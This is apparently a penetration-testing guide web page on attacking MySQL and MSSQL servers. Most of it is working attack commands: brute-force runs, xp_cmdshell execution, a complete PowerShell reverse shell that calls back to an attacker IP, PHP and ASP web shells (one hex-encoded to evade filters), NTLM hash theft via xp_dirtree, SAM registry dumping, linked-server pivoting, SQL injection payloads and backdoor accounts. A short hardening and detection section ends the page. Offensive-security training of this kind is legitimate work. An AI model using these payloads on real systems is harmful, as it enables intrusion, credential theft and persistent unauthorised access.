Network Protocol AttacksSQL Database Service Attacks and Exploitation
SQL Database Service Attacks and Exploitation

SQL Database Service Attacks and Exploitation

Database attack guide for MySQL and MSSQL covering authentication attacks, xp_cmdshell exploitation, hash stealing, impersonation, and linked servers.

MySQLMSSQLSQL ServerDatabase SecurityPort 3306Port 1433SQL Injectionxp_cmdshellHash StealingPenetration Testing

Introduction

MySQL and Microsoft SQL Server (MSSQL) are the most widely deployed relational database management systems (RDBMS) in enterprise environments. These database servers store critical organizational data including user credentials, personal identifiable information (PII), financial records, and proprietary business data.

Database services represent high-value targets due to:

  • Sensitive data storage: Credentials, PII, payment information, intellectual property
  • Privileged access: Database accounts often have elevated system privileges
  • Command execution: Built-in features for OS command execution
  • Lateral movement: Linked servers and trust relationships enable network pivoting
  • Credential harvesting: Authentication hash capture and password extraction
  • Configuration weaknesses: Default credentials, weak passwords, excessive permissions

Why Database Services Are Critical Targets

Database compromise often represents complete organizational breach:

  • MySQL: Over 4 million publicly exposed instances (Shodan)
  • MSSQL: Primary target for ransomware groups
  • Default credentials: Commonly left unchanged in production
  • Excessive privileges: sa/root accounts with system-level access
  • Cloud databases: AWS RDS, Azure SQL exposed to Internet
  • Application integration: Credentials stored in config files

Database attacks frequently lead to:

  • Data exfiltration: Complete database dumps
  • Privilege escalation: System-level command execution
  • Lateral movement: Access to linked servers and trusted systems
  • Ransomware deployment: Direct system access for encryption
  • Credential theft: Password and hash harvesting

Technical Background

MySQL Architecture

Default Port: TCP/3306

Key Components:

  • mysqld: MySQL server daemon
  • mysql: Command-line client
  • Authentication: mysql.user table stores credentials
  • Privileges: Database, table, and column-level permissions

MySQL Versions:

  • MySQL 5.x: Legacy, widespread deployment
  • MySQL 8.x: Modern, improved security features
  • MariaDB: MySQL fork with additional features

MSSQL Architecture

Default Ports:

  • TCP/1433: Standard MSSQL
  • TCP/2433: Hidden mode
  • UDP/1434: SQL Server Browser

Key Components:

  • SQL Server Engine: Core database service
  • SQL Server Agent: Job scheduling and automation
  • Integration Services: ETL and data processing
  • Reporting Services: Report generation

Authentication Modes:

  1. Windows Authentication (Integrated Security)

    • Uses Active Directory credentials
    • No password transmission
    • Kerberos or NTLM authentication

  2. Mixed Mode (SQL Server + Windows)

    • Both SQL and Windows accounts supported
    • SQL accounts with username/password
    • sa account enabled

Default System Databases

MySQL System Databases:

DatabasePurpose
mysqlUser accounts, privileges, stored procedures
information_schemaDatabase metadata (tables, columns, privileges)
performance_schemaServer performance monitoring
sysPerformance tuning and diagnostics

MSSQL System Databases:

DatabasePurpose
masterSystem configuration and metadata
msdbSQL Server Agent jobs and schedules
modelTemplate for new databases
tempdbTemporary objects and storage
resourceSystem objects (read-only)

Enumeration

Port Scanning and Service Detection

# MySQL detection
nmap -p 3306 -sV 10.10.11.45

# MSSQL detection
nmap -p 1433,2433 -sV 10.10.11.45
nmap -p 1433 --script ms-sql-info 10.10.11.45

# Comprehensive SQL scan
nmap -p 1433,3306 -sV --script "mysql-* or ms-sql-*" 10.10.11.0/24

# UDP SQL Browser service
nmap -sU -p 1434 10.10.11.45

Example Output - MySQL:

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.7.38-0ubuntu0.18.04.1

Example Output - MSSQL:

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00
| ms-sql-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: SQL01
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: sql01.corp.local

MySQL Enumeration

# Banner grabbing
nc 10.10.11.45 3306

# Nmap MySQL scripts
nmap -p 3306 --script mysql-info 10.10.11.45
nmap -p 3306 --script mysql-databases --script-args mysqluser=root,mysqlpass=password 10.10.11.45
nmap -p 3306 --script mysql-users --script-args mysqluser=root,mysqlpass=password 10.10.11.45
nmap -p 3306 --script mysql-variables --script-args mysqluser=root,mysqlpass=password 10.10.11.45
nmap -p 3306 --script mysql-audit --script-args mysql-audit.username=root,mysql-audit.password=password 10.10.11.45

# Check for anonymous access
mysql -h 10.10.11.45 -u root
mysql -h 10.10.11.45 -u root -p

# Common MySQL default credentials
# root:root
# root:(blank)
# admin:admin

MSSQL Enumeration

# Nmap MSSQL scripts
nmap -p 1433 --script ms-sql-info 10.10.11.45
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 10.10.11.45
nmap -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt 10.10.11.45
nmap -p 1433 --script ms-sql-empty-password 10.10.11.45
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=password 10.10.11.45

# MSSQL Browser enumeration
nmap -sU -p 1434 --script ms-sql-discover 10.10.11.0/24

Exploitation Techniques

Authentication Attacks

Test Default Credentials

MySQL Common Defaults:

# Test common credentials
mysql -h 10.10.11.45 -u root -p
# Password: (blank), root, password, admin, mysql

mysql -h 10.10.11.45 -u admin -padmin
mysql -h 10.10.11.45 -u dbuser -pdbuser

MSSQL Common Defaults:

# Using mssqlclient.py (Impacket)
mssqlclient.py [email protected]
# Password: (blank), sa, password, Password123

# Using sqsh
sqsh -S 10.10.11.45 -U sa -P 'password'

# Using sqlcmd (Windows)
sqlcmd -S 10.10.11.45 -U sa -P 'password'

Brute-Force Attacks

MySQL Brute-Force:

# Using Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.10.11.45

# Multiple users
hydra -L users.txt -P passwords.txt mysql://10.10.11.45

# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_login) > run

MSSQL Brute-Force:

# Using Hydra
hydra -l sa -P /usr/share/wordlists/rockyou.txt mssql://10.10.11.45

# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/mssql/mssql_login
msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/mssql/mssql_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/mssql/mssql_login) > run

# Using Nmap
nmap -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt 10.10.11.45

Connecting with Valid Credentials

MySQL Connection:

# Command-line client
mysql -h 10.10.11.45 -u root -p'Password123!'

# Specify database
mysql -h 10.10.11.45 -u admin -p'admin' -D database_name

# Execute query directly
mysql -h 10.10.11.45 -u root -p'password' -e "SELECT user,host FROM mysql.user"

MSSQL Connection:

# Using mssqlclient.py (Linux)
mssqlclient.py DOMAIN/username:[email protected]
mssqlclient.py sa:[email protected] -windows-auth

# Using sqsh (Linux)
sqsh -S 10.10.11.45 -U sa -P 'Password123!' -h

# Using sqlcmd (Windows)
sqlcmd -S 10.10.11.45 -U sa -P 'Password123!'

# Windows Authentication
sqsh -S 10.10.11.45 -U DOMAIN\\username -P 'password' -h

Database Enumeration Post-Authentication

MySQL Enumeration

-- Show databases
SHOW DATABASES;

-- Select database
USE database_name;

-- Show tables
SHOW TABLES;

-- Describe table structure
DESCRIBE table_name;

-- List all users
SELECT user, host, authentication_string FROM mysql.user;

-- Check current user and privileges
SELECT USER(), CURRENT_USER();
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';

-- Version information
SELECT @@version;
SELECT version();

-- Database variables
SHOW VARIABLES;
SHOW VARIABLES LIKE 'secure_file_priv';

MSSQL Enumeration

-- Show databases
SELECT name FROM master.dbo.sysdatabases;
GO

-- Select database
USE database_name;
GO

-- Show tables
SELECT table_name FROM information_schema.tables;
GO

-- List columns
SELECT column_name FROM information_schema.columns WHERE table_name='users';
GO

-- List users and roles
SELECT name, type_desc FROM sys.server_principals;
GO

-- Check current user
SELECT SYSTEM_USER, USER_NAME();
GO

-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
GO

-- Version information
SELECT @@VERSION;
GO

-- Server configuration
EXEC sp_configure;
GO

Command Execution

MSSQL - Enable xp_cmdshell

-- Check if xp_cmdshell is enabled
EXEC sp_configure 'xp_cmdshell';
GO

-- Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO

EXEC sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO

-- Execute commands
EXEC xp_cmdshell 'whoami';
GO

EXEC xp_cmdshell 'ipconfig';
GO

EXEC xp_cmdshell 'net user';
GO

MSSQL - Reverse Shell via xp_cmdshell

# On attack machine - start listener
nc -lvnp 4444

# On attack machine - host reverse shell script
# revshell.ps1:
# $client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);
# $stream = $client.GetStream();
# [byte[]]$bytes = 0..65535|%{0};
# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
#     $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
#     $sendback = (iex $data 2>&1 | Out-String );
#     $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
#     $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
#     $stream.Write($sendbyte,0,$sendbyte.Length);
#     $stream.Flush()
# };
python3 -m http.server 8000
-- Download and execute PowerShell reverse shell
EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5:8000/revshell.ps1'')"';
GO

-- Alternative: Direct PowerShell reverse shell
EXEC xp_cmdshell 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(''10.10.14.5'',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ''PS '' + (pwd).Path + ''> '';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"';
GO

MySQL - User Defined Functions (UDF)

MySQL doesn't have built-in command execution like MSSQL, but can use UDF:

# Download lib_mysqludf_sys
wget https://github.com/mysqludf/lib_mysqludf_sys/releases/download/v1.0.4/lib_mysqludf_sys.so

# Upload to target MySQL server
# Method depends on access (web upload, file write, etc.)
-- Load UDF library
USE mysql;
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('whoami');

-- Alternative functions
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('whoami');

File Operations

MySQL - Read Local Files

-- Check secure_file_priv setting
SHOW VARIABLES LIKE 'secure_file_priv';

-- Read file using LOAD_FILE()
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:\\Windows\\System32\\drivers\\etc\\hosts');

-- Read web application config
SELECT LOAD_FILE('/var/www/html/config.php');
SELECT LOAD_FILE('C:\\inetpub\\wwwroot\\web.config');

MySQL - Write Files (Web Shell)

-- Write PHP web shell
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

-- Write ASP web shell
SELECT '<%
response.write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll())
%>' INTO OUTFILE 'C:\\inetpub\\wwwroot\\shell.asp';

-- Hex-encoded payload (bypass filters)
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E INTO OUTFILE '/var/www/html/shell.php';
-- 0x3C3F... is hex for: <?php system($_GET["cmd"]); ?>

-- Access web shell
# http://10.10.11.45/shell.php?cmd=whoami

MSSQL - Write Files

-- Enable OLE Automation Procedures
EXEC sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO

EXEC sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

-- Write web shell
DECLARE @OLE INT;
DECLARE @FileID INT;
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'C:\inetpub\wwwroot\shell.asp', 8, 1;
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<% response.write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()) %>';
EXECUTE sp_OADestroy @FileID;
EXECUTE sp_OADestroy @OLE;
GO

MSSQL - Read Files

-- Read local files using OPENROWSET
SELECT * FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;
GO

-- Read web.config
SELECT * FROM OPENROWSET(BULK N'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS Contents;
GO

-- Read user files
SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\passwords.txt', SINGLE_CLOB) AS Contents;
GO

MSSQL Hash Stealing

MSSQL can be forced to authenticate to attacker-controlled SMB server, leaking NTLMv2 hashes:

Setup Responder/impacket-smbserver

# Using Responder
sudo responder -I tun0

# Using impacket-smbserver
sudo impacket-smbserver share ./ -smb2support

Trigger Authentication from MSSQL

-- Using xp_dirtree
EXEC master..xp_dirtree '\\10.10.14.5\share\';
GO

-- Using xp_subdirs
EXEC master..xp_subdirs '\\10.10.14.5\share\';
GO

-- Using xp_fileexist
EXEC master..xp_fileexist '\\10.10.14.5\share\file.txt';
GO

Capture Hash

Responder/smbserver will capture the NTLMv2 hash:

[SMB] NTLMv2-SSP Client   : 10.10.11.45
[SMB] NTLMv2-SSP Username : DOMAIN\sqlsvc
[SMB] NTLMv2-SSP Hash     : sqlsvc::DOMAIN:1122334455667788:ABC...

Crack with hashcat:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

MSSQL Privilege Escalation

Check Current Privileges

-- Check current user
SELECT SYSTEM_USER;
SELECT USER_NAME();
GO

-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
GO

-- List impersonatable users
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
GO

Impersonate sa User

-- Impersonate sa
EXECUTE AS LOGIN = 'sa';
GO

-- Verify impersonation
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
GO

-- Execute commands as sa
EXEC sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO

EXEC xp_cmdshell 'whoami';
GO

-- Revert to original user
REVERT;
GO

MSSQL Linked Servers

Linked servers allow querying remote SQL servers:

Enumerate Linked Servers

-- List linked servers
SELECT srvname, isremote FROM sysservers;
GO

-- Get detailed information
EXEC sp_linkedservers;
GO

-- Check linked server login mappings
EXEC sp_helplinkedsrvlogin;
GO

Query Linked Servers

-- Execute query on linked server
SELECT * FROM OPENQUERY([LINKED-SERVER], 'SELECT @@version');
GO

-- Check privileges on linked server
SELECT * FROM OPENQUERY([LINKED-SERVER], 'SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')');
GO

-- Execute commands via linked server (if xp_cmdshell enabled)
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED-SERVER];
GO

Chain Linked Server Execution

-- Execute through multiple linked servers
SELECT * FROM OPENQUERY([LINKED-SERVER1], 'SELECT * FROM OPENQUERY([LINKED-SERVER2], ''SELECT @@version'')');
GO

-- Enable xp_cmdshell on linked server
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE') AT [LINKED-SERVER];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE') AT [LINKED-SERVER];
GO

-- Execute commands
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED-SERVER];
GO

SQL Injection Primer

While full SQL injection is covered in other modules, here are quick reference payloads for service exploitation:

Authentication Bypass

-- MySQL
' OR '1'='1' -- -
' OR '1'='1' #
admin' OR 1=1 -- -

-- MSSQL
' OR '1'='1' --
admin' OR 1=1 --

-- PostgreSQL
' OR '1'='1' --

UNION-based Injection

-- MySQL
' UNION SELECT NULL,NULL,NULL -- -
' UNION SELECT user(),database(),@@version -- -
' UNION SELECT username,password,NULL FROM users -- -

-- MSSQL
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT SYSTEM_USER,DB_NAME(),@@VERSION --
' UNION SELECT username,password,NULL FROM users --

Time-based Blind Injection

-- MySQL
' AND SLEEP(5) -- -
' OR SLEEP(5) -- -

-- MSSQL
'; WAITFOR DELAY '00:00:05' --

-- PostgreSQL
'; SELECT pg_sleep(5) --

Post-Exploitation

Data Exfiltration

-- MySQL: Dump entire database
mysqldump -h 10.10.11.45 -u root -p'password' --all-databases > dump.sql

-- MSSQL: Export data
bcp "SELECT * FROM database.dbo.users" queryout users.txt -S 10.10.11.45 -U sa -P password -c

Credential Harvesting

-- MySQL: Extract users and hashes
SELECT user, authentication_string FROM mysql.user;

-- MSSQL: Dump password hashes
SELECT name, password_hash FROM sys.sql_logins;

-- MSSQL: Dump Windows hashes (requires sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'reg save HKLM\SAM C:\temp\sam';
EXEC xp_cmdshell 'reg save HKLM\SYSTEM C:\temp\system';

Persistence

-- MySQL: Create backdoor user
CREATE USER 'backdoor'@'%' IDENTIFIED BY 'P@ssw0rd123!';
GRANT ALL PRIVILEGES ON *.* TO 'backdoor'@'%' WITH GRANT OPTION;
FLUSH PRIVILEGES;

-- MSSQL: Create backdoor login
CREATE LOGIN backdoor WITH PASSWORD = 'P@ssw0rd123!';
ALTER SERVER ROLE sysadmin ADD MEMBER backdoor;
GO

Detection and Defense

Monitoring Database Activity

MySQL Log Analysis:

# Enable general query log
SET GLOBAL general_log = 'ON';
SET GLOBAL log_output = 'TABLE';

# View query log
SELECT * FROM mysql.general_log ORDER BY event_time DESC LIMIT 100;

# Check for suspicious queries
grep -i "xp_cmdshell\|LOAD_FILE\|INTO OUTFILE" /var/log/mysql/mysql.log

MSSQL Log Analysis:

-- Check recent logins
SELECT login_time, login_name, host_name, program_name
FROM sys.dm_exec_sessions
WHERE is_user_process = 1
ORDER BY login_time DESC;

-- Monitor failed logins (Event ID 18456)
EXEC xp_readerrorlog 0, 1, N'Login failed';

-- Check for xp_cmdshell usage
SELECT * FROM sys.dm_exec_query_stats
CROSS APPLY sys.dm_exec_sql_text(sql_handle)
WHERE text LIKE '%xp_cmdshell%';

Hardening Database Servers

MySQL Hardening

# Run mysql_secure_installation
sudo mysql_secure_installation

# Disable remote root access
DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');
FLUSH PRIVILEGES;

# Remove anonymous users
DELETE FROM mysql.user WHERE User='';
FLUSH PRIVILEGES;

# Remove test database
DROP DATABASE IF EXISTS test;

# Disable LOCAL INFILE
SET GLOBAL local_infile = 0;

# Restrict file operations
SET GLOBAL secure_file_priv = '/var/lib/mysql-files/';

# Bind to localhost only
# /etc/mysql/mysql.conf.d/mysqld.cnf:
bind-address = 127.0.0.1

# Enforce SSL
require_secure_transport = ON

MSSQL Hardening

-- Disable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 0;
GO
RECONFIGURE;
GO

-- Disable OLE Automation
EXEC sp_configure 'Ole Automation Procedures', 0;
GO
RECONFIGURE;
GO

-- Disable remote connections (if not needed)
EXEC sp_configure 'remote access', 0;
GO
RECONFIGURE;
GO

-- Rename sa account
ALTER LOGIN sa WITH NAME = [admin_backup_2023];
GO

-- Enforce strong passwords
ALTER LOGIN sa WITH PASSWORD = 'C0mpl3x!P@ssw0rd2025', CHECK_POLICY = ON;
GO

-- Remove unnecessary permissions
REVOKE CONTROL SERVER FROM [public];
GO

-- Audit login attempts
CREATE SERVER AUDIT [LoginAudit]
TO FILE (FILEPATH = 'C:\SQLAudit\');
GO

ALTER SERVER AUDIT [LoginAudit] WITH (STATE = ON);
GO

Network Security

# Firewall rules - restrict to specific IPs
# MySQL
sudo ufw allow from 10.10.10.0/24 to any port 3306

# MSSQL
sudo ufw allow from 10.10.10.0/24 to any port 1433

# Use VPN or SSH tunneling for remote access
ssh -L 3306:localhost:3306 user@mysql-server
ssh -L 1433:localhost:1433 user@mssql-server

Intrusion Detection

# fail2ban for MySQL
# /etc/fail2ban/jail.local
[mysqld-auth]
enabled = true
port = 3306
filter = mysqld-auth
logpath = /var/log/mysql/error.log
maxretry = 3
bantime = 3600

# Monitor for SQL injection patterns
# /etc/fail2ban/filter.d/sql-injection.conf
[Definition]
failregex = <HOST>.*?(union.*select|information_schema|load_file|into outfile)
ignoreregex =

References

Last updated on

SMTP Service Attacks and Exploitation

SMTP exploitation guide covering user enumeration, open relay testing, email spoofing, brute-force authentication, and NTLM information disclosure.

SSH Service Attacks and Exploitation

Comprehensive SSH attack techniques including password brute-force, key-based attacks, tunneling, port forwarding, and session hijacking methods.

On this page

Introduction
Technical Background
MySQL Architecture
MSSQL Architecture
Default System Databases
Enumeration
Port Scanning and Service Detection
MySQL Enumeration
MSSQL Enumeration
Exploitation Techniques
Authentication Attacks
Test Default Credentials
Brute-Force Attacks
Connecting with Valid Credentials
Database Enumeration Post-Authentication
MySQL Enumeration
MSSQL Enumeration
Command Execution
MSSQL - Enable xp_cmdshell
MSSQL - Reverse Shell via xp_cmdshell
MySQL - User Defined Functions (UDF)
File Operations
MySQL - Read Local Files
MySQL - Write Files (Web Shell)
MSSQL - Write Files
MSSQL - Read Files
MSSQL Hash Stealing
Setup Responder/impacket-smbserver
Trigger Authentication from MSSQL
Capture Hash
MSSQL Privilege Escalation
Check Current Privileges
Impersonate sa User
MSSQL Linked Servers
Enumerate Linked Servers
Query Linked Servers
Chain Linked Server Execution
SQL Injection Primer
Authentication Bypass
UNION-based Injection
Time-based Blind Injection
Post-Exploitation
Data Exfiltration
Credential Harvesting
Persistence
Detection and Defense
Monitoring Database Activity
Hardening Database Servers
MySQL Hardening
MSSQL Hardening
Network Security
Intrusion Detection
References